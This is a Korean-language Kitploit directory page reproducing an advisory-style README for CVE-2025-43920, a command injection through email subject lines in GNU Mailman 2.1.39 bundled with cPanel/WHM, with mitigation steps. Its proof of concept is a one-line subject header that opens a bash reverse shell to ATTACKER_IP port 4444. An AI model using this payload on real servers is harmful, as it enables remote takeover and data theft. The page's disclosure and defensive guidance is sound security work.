Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-43920 — CVE-2025-43920에 대한 개념 증명 익스플로잇, GNU Mailman 2.1.39에서 이메일 제목 줄을 통한 명령 주입 취약점으로, 원격 코드 실행과 리버스 셸 접근을 가능하게 합니다. | Kitploit
도구/GitHubGitHub/0nyx-my7h/cve-2025-43920
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlEmail Security
GitHub0nyx-my7h/cve-2025-43920

CVE-2025-43920

CVE-2025-43920에 대한 개념 증명 익스플로잇, GNU Mailman 2.1.39에서 이메일 제목 줄을 통한 명령 주입 취약점으로, 원격 코드 실행과 리버스 셸 접근을 가능하게 합니다.

저장소 보기
11년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-43920: GNU Mailman 2.1.39 (cPanel/WHM 번들) 이메일 제목을 통한 명령 주입

발견자: Firudin Davudzada & Musazada Aydan
공개 날짜: 2025년 4월
CVE ID: CVE-2025-43920
심각도: 5.4 중간 (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N)
공격 유형: 원격
영향받는 소프트웨어: GNU Mailman 2.1.39 (cPanel/WHM과 번들됨)

개요

cPanel 및 WHM과 함께 번들로 제공되는 GNU Mailman 2.1.39는 인증되지 않은 공격자가 임의의 운영 체제 명령을 실행할 수 있게 하는 중요한 명령 주입 결함에 취약합니다. 이 취약점은 mm_cfg.py 설정 파일에서 PUBLIC_EXTERNAL_ARCHIVER 또는 PRIVATE_EXTERNAL_ARCHIVER를 사용하여 외부 아카이버가 구성되고 이메일 제목 줄에 적절히 이스케이프되지 않은 셸 메타문자가 포함된 경우 발생합니다. 이로 인해 전체 시스템이 손상되어 공격자가 리버스 셸을 설정하고 데이터를 유출하거나 다른 악의적인 행위를 수행할 수 있습니다.

취약점 세부 정보

  • 취약점 유형: 명령 주입
  • 공급업체: GNU Mailman (GNU Mailman)
  • 영향받는 버전: Mailman 2.1.39; 이전 2.1.x 버전에도 영향을 미칠 가능성이 있음 (회귀 테스트 대기 중)
  • 영향받는 구성 요소:
    • 외부 아카이버 구성 (PUBLIC_EXTERNAL_ARCHIVER, PRIVATE_EXTERNAL_ARCHIVER)
    • Mailman/Handlers/ (이메일 제목 처리 로직, CookHeaders.py와 같은 파일 포함 가능)
  • 근본 원인: 외부 아카이버가 구성된 경우 이메일 제목 줄이 적절한 정리 없이 셸 명령에 전달되어 셸 메타문자(예: ;, &, |)가 있는 경우 임의 명령 실행이 가능합니다.
  • 상태: 공식 수정 사항 없음. Mailman 2.1.x는 지원 종료(EOL)됨; Mailman 3.x로의 마이그레이션을 강력히 권장합니다.

개념 증명

이 취약점을 악용하기 위해 공격자는 악성 제목 줄을 포함한 이메일을 Mailman 관리 목록으로 보낼 수 있습니다. 예:

root@kitploit:~
Subject: ;bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1

전제 조건:

  • 대상 Mailman 목록에는 PUBLIC_EXTERNAL_ARCHIVER 또는 PRIVATE_EXTERNAL_ARCHIVER를 통해 외부 아카이버가 구성되어 있어야 합니다.
  • 공격자는 대상 목록으로 보낼 수 있는 메일 서버 또는 클라이언트를 제어해야 합니다.
  • 리버스 셸을 수신하기 위해 ATTACKER_IP:4444에 리스너(예: netcat)가 설정되어 있어야 합니다.

예상 결과: 외부 아카이버 명령이 제목 줄을 정리하지 않으면 악성 명령이 서버에서 실행되어 공격자 서버로의 리버스 셸이 설정됩니다.

공격 벡터

  • 주요 벡터: 외부 아카이버가 구성된 Mailman 관리 메일링 리스트로 전송되는 셸 메타문자를 포함한 악성 이메일 제목 줄.
  • 악용 시나리오:
    • 지속적 접근을 위한 리버스 셸 설정.
    • 데이터 유출, 설정 수정 또는 악성코드 설치를 위한 명령 실행.
    • 다른 취약점과 연계하여 공격 확대.
  • 악용 용이성: 높음, 외부 아카이버가 설정된 공개 또는 잘못 구성된 목록을 모든 이메일 발신자가 대상으로 삼을 수 있기 때문.

보안 영향

  • 코드 실행: 높음 (임의 OS 명령 실행).
  • 권한 상승: 높음 (Mailman 실행 권한에 따라 잠재적 루트 액세스).
  • 정보 노출: 높음 (명령 출력으로 시스템 데이터 노출 가능).
  • 서비스 거부: 높음 (악성 명령으로 서버 충돌 또는 과부하 가능).

완화 조치

즉시 조치

  • 외부 아카이버 비활성화: mm_cfg.py에서 PUBLIC_EXTERNAL_ARCHIVER 및 PRIVATE_EXTERNAL_ARCHIVER를 None으로 설정하여 외부 아카이버 기능을 비활성화합니다:

    root@kitploit:~
    PUBLIC_EXTERNAL_ARCHIVER = None
    PRIVATE_EXTERNAL_ARCHIVER = None
    
  • 입력 정리: 외부 아카이버가 필요한 경우 명령이 제목 줄을 정리하여 셸 메타문자 삽입을 방지하도록 합니다.

  • 구독 제한: 메일링 리스트 구독을 신뢰할 수 있는 사용자로 제한하여 노출을 줄입니다.

장기적 해결책

  • Mailman 3.x로 업그레이드: 강력한 입력 정리 기능을 구현하고 적극적으로 유지 관리되는 Mailman 3.x로 마이그레이션합니다.
  • 이메일 처리 비활성화: 필요하지 않은 경우 Mailman의 이메일 처리 기능을 비활성화하여 공격 벡터를 제거합니다.
  • 환경 강화: 잠재적 익스플로잇의 영향을 제한하기 위해 Mailman을 최소 권한으로 컨테이너화된 환경에서 실행합니다.

타임라인

  • 2025년 1분기: 승인된 침투 테스트 평가 중 발견됨.
  • 2025년 1분기: GNU Mailman 및 cPanel 유지관리자에게 보고됨.
  • 2025년 4월: MITRE에서 CVE 할당.
  • 2025년 4월: 이 저장소를 통해 공개 공개.

참고 자료

  • Mailman 2.1 소스 코드
  • CVE-2025-43920 기록
  • Mailman 보안 권장 사항
  • INCIBE-CERT - CVE-2025-43920
  • VULDB - CVE-2025-43920
  • National Institute of Standards and Technology (NIST) - CVE-2025-43920
  • Tenable - CVE-2025-43920

감사의 말

Firudin Davudzada와 Musazada Aydan은 승인된 침투 테스트 계약 중에 이 취약점을 책임감 있게 공개했습니다. 조정에 도움을 준 MITRE CVE 팀에 감사드립니다.

연락처

이메일: [email protected]\

도구 다운로드